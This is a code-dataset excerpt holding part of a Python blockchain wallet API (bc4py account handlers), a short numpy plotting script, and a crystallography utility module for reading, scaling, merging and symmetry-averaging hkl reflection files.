for k, v in post['coins'].items():\n coins[int(k)] += int(v)\n with create_db(V.DB_ACCOUNT_PATH, f_strict=True) as db:\n cur = db.cursor()\n _from = read_name2userid(ant_from, cur)\n _to = read_name2userid(ant_to, cur)\n txhash = user_account.move_balance(_from, _to, coins, cur)\n db.commit()\n return utils.json_res({'txhash': txhash.hex(), 'from_id': _from, 'to_id': _to})\n except Exception as e:\n return web.Response(text=str(e), status=400)\n\n\nasync def new_address(request):\n with create_db(V.DB_ACCOUNT_PATH) as db:\n cur = db.cursor()\n user_name = request.query.get('account', C.account2name[C.ANT_UNKNOWN])\n user_id = read_name2userid(user_name, cur)\n address = generate_new_address_by_userid(user_id, cur)\n db.commit()\n if user_id == C.ANT_VALIDATOR:\n address = convert_address(ck=address, hrp=V.BECH32_HRP, ver=C.ADDR_VALIDATOR_VER)\n if user_id == C.ANT_CONTRACT:\n address = convert_address(ck=address, hrp=V.BECH32_HRP, ver=C.ADDR_CONTRACT_VER)\n ver_identifier = addr2bin(hrp=V.BECH32_HRP, ck=address)\n return utils.json_res({\n 'account': user_name,\n 'user_id': user_id,\n 'address': address,\n 'version': ver_identifier[0],\n 'identifier': ver_identifier[1:].hex(),\n })\n\n\nasync def get_keypair(request):\n try:\n with create_db(V.DB_ACCOUNT_PATH) as db:\n cur = db.cursor()\n address = request.query['address']\n uuid, keypair, path = read_address2keypair(address, cur)\n return utils.json_res({\n 'uuid': uuid,\n 'address': address,\n 'private_key': keypair.get_secret_key().hex(),\n 'public_key': keypair.get_public_key().hex(),\n 'path': path\n })\n except Exception:\n return utils.error_res()\n\n\n__all__ = [\n \"list_balance\",\n \"list_transactions\",\n \"list_unspents\",\n \"list_private_unspents\",\n \"list_account_address\",\n \"move_one\",\n \"move_many\",\n \"new_address\",\n \"get_keypair\",\n]\n", "sub_path": "bc4py/user/api/accountinfo.py", "file_name": "accountinfo.py", "file_ext": "py", "file_size_in_byte": 7210, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "bc4py.database.create.create_db", "line_number": 15, "usage_type": "call"}, {"api_name": 
"bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 15, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 15, "usage_type": "name"}, {"api_name": "bc4py.database.builder.user_account.get_balance", "line_number": 17, "usage_type": "call"}, {"api_name": "bc4py.database.builder.user_account", "line_number": 17, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 20, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 20, "usage_type": "name"}, {"api_name": "bc4py.database.builder.user_account.get_movement_iter", "line_number": 29, "usage_type": "call"}, {"api_name": "bc4py.database.builder.user_account", "line_number": 29, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 37, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 37, "usage_type": "name"}, {"api_name": "bc4py.database.builder.chain_builder.db", "line_number": 41, "usage_type": "attribute"}, {"api_name": "bc4py.database.builder.chain_builder", "line_number": 41, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.error_res", "line_number": 42, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 42, "usage_type": "name"}, {"api_name": "bc4py.database.builder.chain_builder.best_block", "line_number": 44, "usage_type": "attribute"}, {"api_name": "bc4py.database.builder.chain_builder", "line_number": 44, "usage_type": "name"}, {"api_name": "bc4py.database.tools.get_unspents_iter", "line_number": 51, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 68, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 68, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.error_res", "line_number": 70, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 70, "usage_type": "name"}, {"api_name": "bc4py.database.builder.chain_builder.best_block", "line_number": 75, "usage_type": "attribute"}, {"api_name": "bc4py.database.builder.chain_builder", "line_number": 75, "usage_type": "name"}, {"api_name": "bc4py.database.create.create_db", "line_number": 76, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 76, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 76, "usage_type": "name"}, {"api_name": "bc4py.database.tools.get_my_unspents_iter", "line_number": 78, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 88, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 88, "usage_type": "name"}, {"api_name": "bc4py.database.create.create_db", "line_number": 92, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 92, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 92, "usage_type": "name"}, {"api_name": "bc4py.config.C.account2name", "line_number": 94, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 94, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_UNKNOWN", "line_number": 94, "usage_type": "attribute"}, {"api_name": "bc4py.config.C.ANT_VALIDATOR", "line_number": 99, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 99, "usage_type": "name"}, {"api_name": "bc4py.bip32.convert_address", "line_number": 100, "usage_type": "call"}, {"api_name": "bc4py.config.V.BECH32_HRP", "line_number": 100, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 100, "usage_type": "name"}, 
{"api_name": "bc4py.config.C.ADDR_VALIDATOR_VER", "line_number": 100, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 100, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_CONTRACT", "line_number": 101, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 101, "usage_type": "name"}, {"api_name": "bc4py.bip32.convert_address", "line_number": 102, "usage_type": "call"}, {"api_name": "bc4py.config.V.BECH32_HRP", "line_number": 102, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 102, "usage_type": "name"}, {"api_name": "bc4py.config.C.ADDR_CONTRACT_VER", "line_number": 102, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 102, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 105, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 105, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.content_type_json_check", "line_number": 110, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 110, "usage_type": "name"}, {"api_name": "bc4py.config.C.account2name", "line_number": 111, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 111, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_UNKNOWN", "line_number": 111, "usage_type": "attribute"}, {"api_name": "bc4py.user.Balance", "line_number": 115, "usage_type": "call"}, {"api_name": "bc4py.database.create.create_db", "line_number": 116, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 116, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 116, "usage_type": "name"}, {"api_name": "bc4py.database.builder.user_account.move_balance", "line_number": 120, "usage_type": "call"}, {"api_name": "bc4py.database.builder.user_account", "line_number": 120, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 122, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 122, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.error_res", "line_number": 124, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 124, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.content_type_json_check", "line_number": 129, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 129, "usage_type": "name"}, {"api_name": "bc4py.config.C.account2name", "line_number": 130, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 130, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_UNKNOWN", "line_number": 130, "usage_type": "attribute"}, {"api_name": "bc4py.user.Balance", "line_number": 132, "usage_type": "call"}, {"api_name": "bc4py.database.create.create_db", "line_number": 135, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 135, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 135, "usage_type": "name"}, {"api_name": "bc4py.database.builder.user_account.move_balance", "line_number": 139, "usage_type": "call"}, {"api_name": "bc4py.database.builder.user_account", "line_number": 139, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 141, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 141, "usage_type": "name"}, {"api_name": "aiohttp.web.Response", "line_number": 143, "usage_type": "call"}, {"api_name": "aiohttp.web", "line_number": 143, "usage_type": "name"}, 
{"api_name": "bc4py.database.create.create_db", "line_number": 147, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 147, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 147, "usage_type": "name"}, {"api_name": "bc4py.config.C.account2name", "line_number": 149, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 149, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_UNKNOWN", "line_number": 149, "usage_type": "attribute"}, {"api_name": "bc4py.config.C.ANT_VALIDATOR", "line_number": 153, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 153, "usage_type": "name"}, {"api_name": "bc4py.bip32.convert_address", "line_number": 154, "usage_type": "call"}, {"api_name": "bc4py.config.V.BECH32_HRP", "line_number": 154, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 154, "usage_type": "name"}, {"api_name": "bc4py.config.C.ADDR_VALIDATOR_VER", "line_number": 154, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 154, "usage_type": "name"}, {"api_name": "bc4py.config.C.ANT_CONTRACT", "line_number": 155, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 155, "usage_type": "name"}, {"api_name": "bc4py.bip32.convert_address", "line_number": 156, "usage_type": "call"}, {"api_name": "bc4py.config.V.BECH32_HRP", "line_number": 156, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 156, "usage_type": "name"}, {"api_name": "bc4py.config.C.ADDR_CONTRACT_VER", "line_number": 156, "usage_type": "attribute"}, {"api_name": "bc4py.config.C", "line_number": 156, "usage_type": "name"}, {"api_name": "bc4py.bip32.addr2bin", "line_number": 157, "usage_type": "call"}, {"api_name": "bc4py.config.V.BECH32_HRP", "line_number": 157, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 157, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 158, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 158, "usage_type": "name"}, {"api_name": "bc4py.database.create.create_db", "line_number": 169, "usage_type": "call"}, {"api_name": "bc4py.config.V.DB_ACCOUNT_PATH", "line_number": 169, "usage_type": "attribute"}, {"api_name": "bc4py.config.V", "line_number": 169, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.json_res", "line_number": 173, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 173, "usage_type": "name"}, {"api_name": "bc4py.user.api.utils.error_res", "line_number": 181, "usage_type": "call"}, {"api_name": "bc4py.user.api.utils", "line_number": 181, "usage_type": "name"}]} +{"seq_id": "396338854", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\nI = np.linspace(0,1,1000)\nL=[]\nJ=[]\nfor j in I:\n for k in np.linspace(-10,10,10000):\n if round(k/2,2) == round(j*(1+(4/3)*k**2)**2,2):\n L.append(k)\n J.append(1)\n else:\n J.append(0)\n print(len(L))\nplt.plot(L)\nplt.plot(J,\"r\")\nplt.show()", "sub_path": "SiC 1/Hyst at 30K/carlos.py", "file_name": "carlos.py", "file_ext": "py", "file_size_in_byte": 339, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.linspace", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, 
"usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "89166681", "text": "import numpy as np \nfrom symmetry_related_reflection_generator import sym_rela_ref\nimport diffpy.structure as dst\nimport ctypes as ct\nlibsginfo = ct.CDLL(\"./libsginfo.so\") # load sginfo to use the functions written by c language\n\ndef read_hkl(filename): \n \"\"\"\n function to read hkl file. which has a format of (3i4, f8.2)\n\n filename: name of you hkl file. e.g. ‘COF300.hkl’\n\n Reture: data, a list include 5 list of h, k, l, Intensity and Sigma.\n \"\"\"\n h, k, l, Inte, Sigma = [], [], [], [], [] # creat 5 list to store the 5 column\n data = [] # use one list to store the 5 list \n with open(filename, 'r') as file2read:\n while True:\n lines = file2read.readline()\n if not lines:\n break \n h.append(int(lines[0:4].strip()))\n k.append(int(lines[4:8].strip()))\n l.append(int(lines[8:12].strip()))\n Inte.append(float(lines[12:20].strip()))\n Sigma.append(float(lines[20:28].strip()))\n pass \n pass\n if len(h) == len(k) == len(l) == len(Inte) == len(Sigma): # make sure the length of all list are same\n data.append(h)\n data.append(k)\n data.append(l)\n data.append(Inte)\n data.append(Sigma)\n return data\n else:\n print(\"There must be something wrong!\") # otherwise, return error\n pass\n\ndef produce_new_hkl(data, new_hkl= \"new.hkl\"): \n \"\"\"\n function to generate new hkl file from merged data.\n\n data: merged data, a list include 5 list of h, k, l, Intensity and Sigma.\n\n new_data: filename of your merged data to generated hkl file. whatever name you want, e.g. 'sky_worker.hkl'. 
Defaults to 'new.hkl'.\n\n    Return: merged hkl file.\n    \"\"\"\n    with open(new_hkl, 'w') as fl_w:\n        if len(data[0]) == len(data[1]) == len(data[2]) == len(data[3]) == len(data[4]):\n            for i in range(len(data[0])):\n                h1_temp, k1_temp, l1_temp = str(data[0][i]).rjust(4, \" \"), str(data[1][i]).rjust(4, \" \"), str(data[2][i]).rjust(4, \" \") # formatting the str\n                Inte1_temp, Sigma1_temp = float(data[3][i]), float(data[4][i])\n                Inte1_temp, Sigma1_temp = \"{0:>8.2f}\".format(Inte1_temp), \"{0:>8.2f}\".format(Sigma1_temp) # formatting the str\n                fl_w.write(h1_temp)\n                fl_w.write(k1_temp)\n                fl_w.write(l1_temp)\n                fl_w.write(Inte1_temp)\n                fl_w.write(Sigma1_temp)\n                fl_w.write('\\n')\n        else:\n            print(\"There must be something wrong!\")\n    pass\n\ndef produce_new_hkl2(data2, new_data= \"new.hkl\"): \n    \"\"\"\n    function to generate an hkl file from numpy array data.\n\n    data2: numpy array, n x 5.\n\n    Return: a new hkl file.\n    \"\"\"\n    with open(new_data, 'w') as fl_w:\n        if len(data2[:, 0]):\n            for i in range(len(data2[:, 0])):\n                h1_temp, k1_temp, l1_temp = str(int(data2[i][0])).rjust(4, \" \"), str(int(data2[i][1])).rjust(4, \" \"), str(int(data2[i][2])).rjust(4, \" \") # formatting the str\n                Inte1_temp, Sigma1_temp = float(data2[i][3]), float(data2[i][4])\n                Inte1_temp, Sigma1_temp = \"{0:>8.2f}\".format(Inte1_temp), \"{0:>8.2f}\".format(Sigma1_temp) # formatting the str\n                fl_w.write(h1_temp)\n                fl_w.write(k1_temp)\n                fl_w.write(l1_temp)\n                fl_w.write(Inte1_temp)\n                fl_w.write(Sigma1_temp)\n                fl_w.write('\\n')\n        else:\n            print(\"There must be something wrong!\")\n    pass\n\ndef theta_intensity(filename_hkl, crystal_system, a, b, c, alpha, beta, gamma, wavelength, threshold_min, threshold_max):\n    \"\"\"\n    function to return arrays of 2theta values and intensities.\n\n    filename_hkl: string, e.g. 'MFI.hkl'.\n    \n    crystal_system: e.g. 'cubic'.\n\n    a, b, c, alpha, beta, gamma: unit cell parameters.\n\n    threshold_min, threshold_max: d-value thresholds.\n    \"\"\"\n    data = read_hkl(filename_hkl)\n    theta_list = []\n    inte_list = []\n    for i in range(len(data[0])):\n        d_value = dhkl_cal2(crystal_system, a, b, c, alpha, beta, gamma, data[0][i], data[1][i], data[2][i])\n        if d_value > threshold_min and d_value < threshold_max:\n            two_theta = 2*np.arcsin(wavelength / (2*d_value)) * 180 / np.pi\n            theta_list.append(two_theta)\n            inte_list.append(data[3][i])\n    return np.array(theta_list), np.array(inte_list)\n\nimport matplotlib.pyplot as plt\ndef plot_theta_intensity(theta_list, inte_list):\n    \"\"\"\n    function to plot intensity against 2theta.\n    \"\"\"\n    theta_list, inte_list = np.array(theta_list), np.array(inte_list)\n    plt.figure(figsize=(22, 5), dpi=80)\n    plt.xlabel(\"2 theta, wavelength = 0.02508 angstrom\")\n    plt.ylabel(\"Intensity\")\n    plt.scatter(theta_list, inte_list, s = 30, c='blue')\n    plt.show()\n\ndef intensity_monitor(filename_hkl, crystal_system, a, b, c, alpha, beta, gamma, wavelength = 0.02508, threshold_min = 1.0, threshold_max = 50):\n    \"\"\"\n    function to monitor the intensity variation against 2theta value.\n\n    crystal_system: e.g. 
'cubic'.\n\n    a, b, c, alpha, beta, gamma: unit cell parameters.\n\n    threshold_min, threshold_max: d-value thresholds.\n    \"\"\"\n    theta_list, inte_list = theta_intensity(filename_hkl, crystal_system, a, b, c, alpha, beta, gamma, wavelength, threshold_min, threshold_max)\n    return plot_theta_intensity(theta_list, inte_list)\n\ndef compare2data(filename_hkl1, filename_hkl2, crystal_system, a, b, c, alpha, beta, gamma, scale=1.0, wavelength=0.02508, threshold_min=1.0, threshold_max=50):\n    \"\"\"\n    function to compare the intensity variation of 2 hkl data sets.\n\n    filename_hkl1, filename_hkl2: string, e.g. 'MFI.hkl'. \n\n    crystal_system: e.g. 'cubic'.\n\n    a, b, c, alpha, beta, gamma: unit cell parameters.\n\n    scale: the scale applied to hkl2 to compare the two data sets.\n    \"\"\"\n    theta_list1, inte_list1 = theta_intensity(filename_hkl1, crystal_system, a, b, c, alpha, beta, gamma, wavelength, threshold_min, threshold_max)\n    theta_list2, inte_list2 = theta_intensity(filename_hkl2, crystal_system, a, b, c, alpha, beta, gamma, wavelength, threshold_min, threshold_max)\n    theta_list1, inte_list1 = np.array(theta_list1), np.array(inte_list1)\n    theta_list2, inte_list2 = np.array(theta_list2), np.array(inte_list2) * scale\n    plt.figure(figsize=(22,5), dpi=100)\n    axes = plt.subplot(111) \n    label1 = axes.scatter(theta_list1, inte_list1, s=30, c='red')\n    label2 = axes.scatter(theta_list2, inte_list2, s=30, c='blue')\n    plt.xlabel('2 theta, wavelength = 0.02508 angstrom')\n    plt.ylabel('Intensity')\n    axes.legend((label1, label2), ('hkl-1', 'hkl-2'), loc=1)\n    plt.show()\n\ndef scale_cal(data1, data2): \n    \"\"\"\n    function to calculate the scale of two data sets, returning the calculated scale and repeated hkl list.\n\n    data1 and data2: lists containing 5 lists of h, k, l, Intensity and Sigma.\n\n    Return: repeat_data, a list recording the positions of repeated hkl in data2 or hkl2. \n    scale_calculated: a float number, recording the averaged scale of hkl1/hkl2. \n    \n    \"\"\"\n    repeat_data, scale = [], []\n    for i in range(len(data1[0])):\n        for j in range(len(data2[0])):\n            if data1[0][i] == data2[0][j] and data1[1][i] == data2[1][j] and data1[2][i] == data2[2][j]:\n                repeat_data.append(j)\n                data1_temp = data1[3][i]\n                data2_temp = data2[3][j]\n                scale.append(data1_temp/data2_temp)\n    scale_square_sum = 0\n    for k in range(len(scale)):\n        scale_square_sum += np.square(scale[k])\n    if len(scale):\n        scale_calculated = np.sqrt(scale_square_sum / len(scale)) \n        return repeat_data, scale_calculated\n    else: \n        print(\"Something wrong happened!\")\n        pass \n\ndef merge2hkl(hkl_file1, hkl_file2, filename_merge): \n    \"\"\"\n    function to merge two hkl files; with the two data sets, the calculated scale and the repeated hkl list, you can merge your data.\n\n    hkl_file1 and hkl_file2: string, e.g. \"Sky_worker.hkl\"\n\n    filename_merge: string, e.g. 
\"Sky_worker.hkl\"\n\n Return: merged hkl file.\n\n There are two different situlation: scale > 1 or scale < 1.\n \n \"\"\"\n data1, data2 = read_hkl(hkl_file1), read_hkl(hkl_file2)\n repeat_data2, scale_c = scale_cal(data1, data2)\n print(\"There are %s reflections repeated.\" % len(repeat_data2))\n print(\"The scale of data1 / data2 is:\", scale_c)\n if scale_c > 1.0:\n data1[3] = np.array(data1[3]) / scale_c \n data1[3] = list(data1[3]) \n data = data1\n for i in range(len(data2[0])):\n if i in repeat_data2:\n continue \n data[0].append(data2[0][i])\n data[1].append(data2[1][i])\n data[2].append(data2[2][i])\n data[3].append(data2[3][i])\n data[4].append(data2[4][i])\n if len(data[0]) == len(data[1]) == len(data[2]) == len(data[3]) == len(data[4]):\n return produce_new_hkl(data, filename_merge) \n else:\n print(\"Something wrong happended!\") \n pass \n\n elif scale_c >0 and scale_c <= 1.0:\n data = data1 \n data2[3] = np.array(data2[3]) * scale_c \n data2[3] = list(data2[3])\n for i in range(len(data2[0])):\n if i in repeat_data2:\n continue \n data[0].append(data2[0][i])\n data[1].append(data2[1][i])\n data[2].append(data2[2][i])\n data[3].append(data2[3][i])\n data[4].append(data2[4][i])\n if len(data[0]) == len(data[1]) == len(data[2]) == len(data[3]) == len(data[4]):\n return produce_new_hkl(data, filename_merge)\n else:\n print(\"Something wrong happended!\") \n pass \n else:\n print(\"You got a big problem!\")\n pass \n\n\ndef reduce_list(a_list=[]):\n \"\"\"\n to reduce the repeated hkl in one list which is not hashable, therefore set() function can not be used. \n\n a_list: a list of hkl indices.\n\n Return: non-repeated hkl list.\n\n \"\"\"\n b_list = a_list \n c_list = []\n for i in range(len(b_list)):\n if b_list[i] not in c_list:\n c_list.append(b_list[i])\n return c_list\n\ndef sym_related(space_group, filename_hkl, filename_new='new.hkl'): \n \"\"\" \n function to merge all symmetry related reflecitons in one hkl file. \n\n space_group: string, e.g. 'Pnma'.\n\n filename_hkl: e.g. ‘MFI.hkl’\n\n Return: generate a new merged hkl file.\n \"\"\"\n data = read_hkl(filename_hkl)\n laue_group = laue_c2py(spg2laue(2, space_group))\n h1, k1, l1, Inte1, Sigma1 = data[0], data[1], data[2], data[3], data[4]\n data_new = []\n for p in range(len(h1)): # loop all the hkl lsit\n p_related_reflection = sym_rela_ref(laue_group, h1[p], k1[p], l1[p]) # find the symmetry related reflections using laue group\n p_related_reflection = reduce_list(p_related_reflection) # for some hkl, there are same element in the list. 
\n        prr = p_related_reflection # use an easier name\n        ref_count = [] # a list to record symmetry related reflections\n        sum_Inte = 0 # record the intensity information\n        if len(prr) > 1: # generally prr should be larger than 1\n            for i in range(len(prr)): # loop the prr and hkl list, to find the symmetry related reflections\n                for j in range(len(h1)):\n                    if prr[i] == [h1[j], k1[j], l1[j]] and prr[i] != [h1[p], k1[p], l1[p]]: # if found, record the positions\n                        ref_count.append(j) # record the positions \n                        sum_Inte += Inte1[j] # record the summation of intensity\n            average_Inte = (sum_Inte + Inte1[p]) / (len(ref_count) + 1) # calculate the average intensity of all symmetry related reflections\n            Inte1[p] = average_Inte # apply the average intensity to p reflection\n            for m in range(len(ref_count)):\n                Inte1[ref_count[m]] = average_Inte # apply the average intensity to all symmetry related reflections\n        else:\n            pass\n    if len(h1) == len(k1) == len(l1) == len(Inte1) == len(Sigma1): # make sure the lengths of all lists are the same\n        data_new.append(h1)\n        data_new.append(k1)\n        data_new.append(l1)\n        data_new.append(Inte1)\n        data_new.append(Sigma1)\n    return produce_new_hkl(data_new, filename_new) \n\ndef sym_related_unique(space_group, filename_hkl, filename_unique, filename_new='unique.hkl', maxh = 30, maxk = 30, maxl = 30): \n    \"\"\"\n    function to obtain a unique hkl file.\n\n    space_group: string, e.g. 'Pnma'. \n\n    filename_hkl: e.g. 'MFI.hkl'\n\n    filename_unique: sginfo will generate a unique txt file. \n\n    filename_new: The name of the unique reflections hkl file you want to generate. \n    \"\"\"\n    data = read_hkl(filename_hkl)\n    gene_unique_reflection(space_group, filename_unique, maxh, maxk, maxl)\n    laue_group = laue_c2py(spg2laue(2, space_group))\n    print(\"The laue group of space group %s is: %s \" % (space_group, laue_group))\n    unique = np.loadtxt(filename_unique) # load the unique hkl list\n    h1, k1, l1, Inte1, Sigma1 = data[0], data[1], data[2], data[3], data[4] # extract columns from data\n    unique_gene = np.empty(shape=[0, 5]) # numpy array used to store the unique hkl list\n    for i in range(len(unique)):\n        i_full = sym_rela_ref(laue_group, int(unique[i][0]), int(unique[i][1]), int(unique[i][2])) # generate symmetry related reflections of hkl \n        i_full = reduce_list(i_full)\n        unique_temp = np.empty(shape = [1, 5])\n        sum_temp = [] # for a unique reflection, to store reflections that were symmetry related to the unique reflection\n        for j in range(len(h1)):\n            if list((int(h1[j]), int(k1[j]), int(l1[j]))) in i_full:\n                sum_temp.append(j)\n        if len(sum_temp):\n            sum_inte = 0\n            for k in range(len(sum_temp)):\n                sum_inte += Inte1[sum_temp[k]] # add intensity of all symmetry related reflections and then calculate the average value \n            intensity = sum_inte / len(sum_temp)\n            unique_temp[0][0] = unique[i][0]\n            unique_temp[0][1] = unique[i][1]\n            unique_temp[0][2] = unique[i][2]\n            unique_temp[0][3] = intensity # use average intensity\n            unique_temp[0][4] = 0.0\n            unique_gene = np.append(unique_gene, unique_temp, axis = 0)\n    return produce_new_hkl2(unique_gene, filename_new)\n\ndef sym_related_single(space_group, p, data):\n    \"\"\" function to check the symmetry related reflections of one specific reflection.\n    \n    space_group: string such as 'Pnma'. 
\n\n    p: the reflection of number p.\n\n    data: a list containing 5 lists of h, k, l, Intensity and Sigma.\n\n    Return: nothing, but it will tell you some information about this reflection and its symmetry related reflections.\n    \n    \"\"\"\n    laue_group = laue_c2py(spg2laue(2, space_group))\n    h1, k1, l1, Inte1, Sigma1 = data[0], data[1], data[2], data[3], data[4]\n    print('The original reflection and its intensity: ', (h1[p], k1[p], l1[p]), Inte1[p])\n    related_reflection = sym_rela_ref(laue_group, h1[p], k1[p], l1[p]) \n    related_reflection = reduce_list(related_reflection)\n    rr = related_reflection\n    ref_count = []\n    sym_inte = []\n    sum_Inte = 0\n    for i in range(len(rr)):\n        for j in range(len(h1)):\n            if rr[i] == [h1[j], k1[j], l1[j]] and rr[i] != [h1[p], k1[p], l1[p]]: \n                ref_count.append(j)\n                sum_Inte += Inte1[j]\n                sym_inte.append(Inte1[j]) \n                print('The symmetry related reflection and its intensity: ', (h1[j], k1[j], l1[j]), Inte1[j])\n    average_Inte = (sum_Inte + Inte1[p]) / (len(ref_count) + 1)\n    print('The symmetry related reflection numbers: ', len(ref_count))\n    print('The average value of intensity of these reflections: ', average_Inte)\n    sym_inte.append(Inte1[p])\n    max_value = max(sym_inte)\n    print(\"The max value of all symmetry related reflections: \", max_value)\n    if len(sym_inte) != 0:\n        for m in range(len(ref_count)):\n            Inte1[ref_count[m]] = max_value \n            print(\"The Intensity of reflection now: \", (h1[ref_count[m]], k1[ref_count[m]], l1[ref_count[m]]), Inte1[ref_count[m]]) \n\ndef spg2laue(num, spg): # define spg2laue function to use a function in sginfo, returning the laue group from the space group\n    \"\"\"\n    function to return the laue group from the space group. e.g. if you use 'Pnma' it will return 'mmm'\n\n    num: a number, no special meaning, just use 2.\n\n    spg: space group name, e.g. 'Pnma'.\n    \n    Return: the pointer of its laue group.\n    \"\"\"\n    libsginfo.call_lg.argtypes = (ct.c_int, ct.c_char_p)\n    libsginfo.call_lg.restype = ct.c_char_p\n    num = ct.c_int(num)\n    spg = ct.c_char_p(spg.encode('utf-8'))\n    return libsginfo.call_lg(num, spg)\n\ndef laue_c2py(laue_group): # define a function to call the laue dict\n    \"\"\"\n    function to translate a ctypes laue group into a Python string\n\n    laue_group: laue group obtained by calling sginfo.\n    \"\"\"\n    laue_gp = {\n        \"-1\".encode('utf-8'): \"-1\",\n        \"2/m\".encode('utf-8'): \"2/m\",\n        \"mmm\".encode('utf-8'): \"mmm\",\n        \"4/m\".encode('utf-8'): \"4/m\",\n        \"4/mmm\".encode('utf-8'): \"4/mmm\",\n        \"-3\".encode('utf-8'): \"-3\",\n        \"-3m1\".encode('utf-8'): \"-3m\",\n        \"6m\".encode('utf-8'): \"6/m\",\n        \"6/mmm\".encode('utf-8'): \"6/mmm\",\n        \"m-3\".encode('utf-8'): \"m-3\",\n        \"m-3m\".encode('utf-8'): \"m-3m\"}\n    return laue_gp[laue_group] \n\ndef gene_unique_reflection(space_group, filename, maxh, maxk, maxl): \n    \"\"\"\n    function to generate an independent reflection file. \n\n    space_group: space group name, e.g. \"Pnma\"\n\n    filename: filename of the independent reflection list file you want to generate. e.g. \"MFI_unique.txt\"\n\n    maxh, maxk, maxl: the maximum value of h, k, l you want to generate\n\n    Return: an hkl list recording independent reflections with a limit of maxh, maxk, maxl. 
